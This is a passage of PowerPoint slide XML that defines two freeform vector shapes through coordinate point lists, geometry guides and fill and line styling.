                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36395" name="Freeform 127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3307" y="2653"/>
                <a:ext cx="105" cy="94"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 92 w 105"/>
                  <a:gd name="T1" fmla="*/ 92 h 94"/>
                  <a:gd name="T2" fmla="*/ 85 w 105"/>
                  <a:gd name="T3" fmla="*/ 86 h 94"/>
                  <a:gd name="T4" fmla="*/ 73 w 105"/>
                  <a:gd name="T5" fmla="*/ 74 h 94"/>
                  <a:gd name="T6" fmla="*/ 66 w 105"/>
                  <a:gd name="T7" fmla="*/ 65 h 94"/>
                  <a:gd name="T8" fmla="*/ 55 w 105"/>
                  <a:gd name="T9" fmla="*/ 60 h 94"/>
                  <a:gd name="T10" fmla="*/ 50 w 105"/>
                  <a:gd name="T11" fmla="*/ 59 h 94"/>
                  <a:gd name="T12" fmla="*/ 47 w 105"/>
                  <a:gd name="T13" fmla="*/ 58 h 94"/>
                  <a:gd name="T14" fmla="*/ 41 w 105"/>
                  <a:gd name="T15" fmla="*/ 60 h 94"/>
                  <a:gd name="T16" fmla="*/ 38 w 105"/>
                  <a:gd name="T17" fmla="*/ 58 h 94"/>
                  <a:gd name="T18" fmla="*/ 29 w 105"/>
                  <a:gd name="T19" fmla="*/ 60 h 94"/>
                  <a:gd name="T20" fmla="*/ 23 w 105"/>
                  <a:gd name="T21" fmla="*/ 56 h 94"/>
                  <a:gd name="T22" fmla="*/ 15 w 105"/>
                  <a:gd name="T23" fmla="*/ 66 h 94"/>
                  <a:gd name="T24" fmla="*/ 8 w 105"/>
                  <a:gd name="T25" fmla="*/ 60 h 94"/>
                  <a:gd name="T26" fmla="*/ 3 w 105"/>
                  <a:gd name="T27" fmla="*/ 62 h 94"/>
                  <a:gd name="T28" fmla="*/ 1 w 105"/>
                  <a:gd name="T29" fmla="*/ 57 h 94"/>
                  <a:gd name="T30" fmla="*/ 1 w 105"/>
                  <a:gd name="T31" fmla="*/ 47 h 94"/>
                  <a:gd name="T32" fmla="*/ 6 w 105"/>
                  <a:gd name="T33" fmla="*/ 32 h 94"/>
                  <a:gd name="T34" fmla="*/ 8 w 105"/>
                  <a:gd name="T35" fmla="*/ 22 h 94"/>
                  <a:gd name="T36" fmla="*/ 15 w 105"/>
                  <a:gd name="T37" fmla="*/ 18 h 94"/>
                  <a:gd name="T38" fmla="*/ 19 w 105"/>
                  <a:gd name="T39" fmla="*/ 13 h 94"/>
                  <a:gd name="T40" fmla="*/ 23 w 105"/>
                  <a:gd name="T41" fmla="*/ 11 h 94"/>
                  <a:gd name="T42" fmla="*/ 29 w 105"/>
                  <a:gd name="T43" fmla="*/ 8 h 94"/>
                  <a:gd name="T44" fmla="*/ 33 w 105"/>
                  <a:gd name="T45" fmla="*/ 1 h 94"/>
                  <a:gd name="T46" fmla="*/ 36 w 105"/>
                  <a:gd name="T47" fmla="*/ 1 h 94"/>
                  <a:gd name="T48" fmla="*/ 44 w 105"/>
                  <a:gd name="T49" fmla="*/ 28 h 94"/>
                  <a:gd name="T50" fmla="*/ 53 w 105"/>
                  <a:gd name="T51" fmla="*/ 49 h 94"/>
                  <a:gd name="T52" fmla="*/ 54 w 105"/>
                  <a:gd name="T53" fmla="*/ 44 h 94"/>
                  <a:gd name="T54" fmla="*/ 57 w 105"/>
                  <a:gd name="T55" fmla="*/ 44 h 94"/>
                  <a:gd name="T56" fmla="*/ 63 w 105"/>
                  <a:gd name="T57" fmla="*/ 52 h 94"/>
                  <a:gd name="T58" fmla="*/ 68 w 105"/>
                  <a:gd name="T59" fmla="*/ 52 h 94"/>
                  <a:gd name="T60" fmla="*/ 84 w 105"/>
                  <a:gd name="T61" fmla="*/ 68 h 94"/>
                  <a:gd name="T62" fmla="*/ 89 w 105"/>
                  <a:gd name="T63" fmla="*/ 69 h 94"/>
                  <a:gd name="T64" fmla="*/ 94 w 105"/>
                  <a:gd name="T65" fmla="*/ 77 h 94"/>
                  <a:gd name="T66" fmla="*/ 95 w 105"/>
                  <a:gd name="T67" fmla="*/ 80 h 94"/>
                  <a:gd name="T68" fmla="*/ 105 w 105"/>
                  <a:gd name="T69" fmla="*/ 88 h 94"/>
                  <a:gd name="T70" fmla="*/ 101 w 105"/>
                  <a:gd name="T71" fmla="*/ 94 h 94"/>
                  <a:gd name="T72" fmla="*/ 95 w 105"/>
                  <a:gd name="T73" fmla="*/ 92 h 94"/>
                  <a:gd name="T74" fmla="*/ 93 w 105"/>
                  <a:gd name="T75" fmla="*/ 93 h 94"/>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05"/>
                  <a:gd name="T115" fmla="*/ 0 h 94"/>
                  <a:gd name="T116" fmla="*/ 105 w 105"/>
                  <a:gd name="T117" fmla="*/ 94 h 94"/>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05" h="94">
                    <a:moveTo>
                      <a:pt x="93" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="92" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="93"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36396" name="Freeform 128"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3307" y="2653"/>
                <a:ext cx="105" cy="94"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 92 w 105"/>
                  <a:gd name="T1" fmla="*/ 92 h 94"/>
                  <a:gd name="T2" fmla="*/ 85 w 105"/>
                  <a:gd name="T3" fmla="*/ 86 h 94"/>
                  <a:gd name="T4" fmla="*/ 73 w 105"/>
                  <a:gd name="T5" fmla="*/ 74 h 94"/>
                  <a:gd name="T6" fmla="*/ 66 w 105"/>
                  <a:gd name="T7" fmla="*/ 65 h 94"/>
                  <a:gd name="T8" fmla="*/ 55 w 105"/>
                  <a:gd name="T9" fmla="*/ 60 h 94"/>
                  <a:gd name="T10" fmla="*/ 50 w 105"/>
                  <a:gd name="T11" fmla="*/ 59 h 94"/>
                  <a:gd name="T12" fmla="*/ 47 w 105"/>
                  <a:gd name="T13" fmla="*/ 58 h 94"/>
                  <a:gd name="T14" fmla="*/ 41 w 105"/>
                  <a:gd name="T15" fmla="*/ 60 h 94"/>
                  <a:gd name="T16" fmla="*/ 38 w 105"/>
                  <a:gd name="T17" fmla="*/ 58 h 94"/>
                  <a:gd name="T18" fmla="*/ 29 w 105"/>
                  <a:gd name="T19" fmla="*/ 60 h 94"/>
                  <a:gd name="T20" fmla="*/ 23 w 105"/>
                  <a:gd name="T21" fmla="*/ 56 h 94"/>
                  <a:gd name="T22" fmla="*/ 15 w 105"/>
                  <a:gd name="T23" fmla="*/ 66 h 94"/>
                  <a:gd name="T24" fmla="*/ 8 w 105"/>
                  <a:gd name="T25" fmla="*/ 60 h 94"/>
                  <a:gd name="T26" fmla="*/ 3 w 105"/>
                  <a:gd name="T27" fmla="*/ 62 h 94"/>
                  <a:gd name="T28" fmla="*/ 1 w 105"/>
                  <a:gd name="T29" fmla="*/ 57 h 94"/>
                  <a:gd name="T30" fmla="*/ 1 w 105"/>
                  <a:gd name="T31" fmla="*/ 47 h 94"/>
                  <a:gd name="T32" fmla="*/ 6 w 105"/>
                  <a:gd name="T33" fmla="*/ 32 h 94"/>
                  <a:gd name="T34" fmla="*/ 8 w 105"/>
                  <a:gd name="T35" fmla="*/ 22 h 94"/>
                  <a:gd name="T36" fmla="*/ 15 w 105"/>
                  <a:gd name="T37" fmla="*/ 18 h 94"/>
                  <a:gd name="T38" fmla="*/ 19 w 105"/>
                  <a:gd name="T39" fmla="*/ 13 h 94"/>
                  <a:gd name="T40" fmla="*/ 23 w 105"/>
                  <a:gd name="T41" fmla="*/ 11 h 94"/>
                  <a:gd name="T42" fmla="*/ 29 w 105"/>
                  <a:gd name="T43" fmla="*/ 8 h 94"/>
                  <a:gd name="T44" fmla="*/ 33 w 105"/>
                  <a:gd name="T45" fmla="*/ 1 h 94"/>
                  <a:gd name="T46" fmla="*/ 36 w 105"/>
                  <a:gd name="T47" fmla="*/ 1 h 94"/>
                  <a:gd name="T48" fmla="*/ 44 w 105"/>
                  <a:gd name="T49" fmla="*/ 28 h 94"/>
                  <a:gd name="T50" fmla="*/ 53 w 105"/>
                  <a:gd name="T51" fmla="*/ 49 h 94"/>
                  <a:gd name="T52" fmla="*/ 54 w 105"/>
                  <a:gd name="T53" fmla="*/ 44 h 94"/>
                  <a:gd name="T54" fmla="*/ 57 w 105"/>
                  <a:gd name="T55" fmla="*/ 44 h 94"/>
                  <a:gd name="T56" fmla="*/ 63 w 105"/>
                  <a:gd name="T57" fmla="*/ 52 h 94"/>
                  <a:gd name="T58" fmla="*/ 68 w 105"/>
                  <a:gd name="T59" fmla="*/ 52 h 94"/>
                  <a:gd name="T60" fmla="*/ 84 w 105"/>
                  <a:gd name="T61" fmla="*/ 68 h 94"/>
                  <a:gd name="T62" fmla="*/ 89 w 105"/>
                  <a:gd name="T63" fmla="*/ 69 h 94"/>
                  <a:gd name="T64" fmla="*/ 94 w 105"/>
                  <a:gd name="T65" fmla="*/ 77 h 94"/>
                  <a:gd name="T66" fmla="*/ 95 w 105"/>
                  <a:gd name="T67" fmla="*/ 80 h 94"/>
                  <a:gd name="T68" fmla="*/ 105 w 105"/>
                  <a:gd name="T69" fmla="*/ 88 h 94"/>
                  <a:gd name="T70" fmla="*/ 101 w 105"/>
                  <a:gd name="T71" fmla="*/ 94 h 94"/>
                  <a:gd name="T72" fmla="*/ 95 w 105"/>
                  <a:gd name="T73" fmla="*/ 92 h 94"/>
                  <a:gd name="T74" fmla="*/ 93 w 105"/>
                  <a:gd name="T75" fmla="*/ 93 h 94"/>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05"/>
                  <a:gd name="T115" fmla="*/ 0 h 94"/>
                  <a:gd name="T116" fmla="*/ 105 w 105"/>
                  <a:gd name="T117" fmla="*/ 94 h 94"/>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05" h="94">
                    <a:moveTo>
                      <a:pt x="93" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="92" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="51"/>
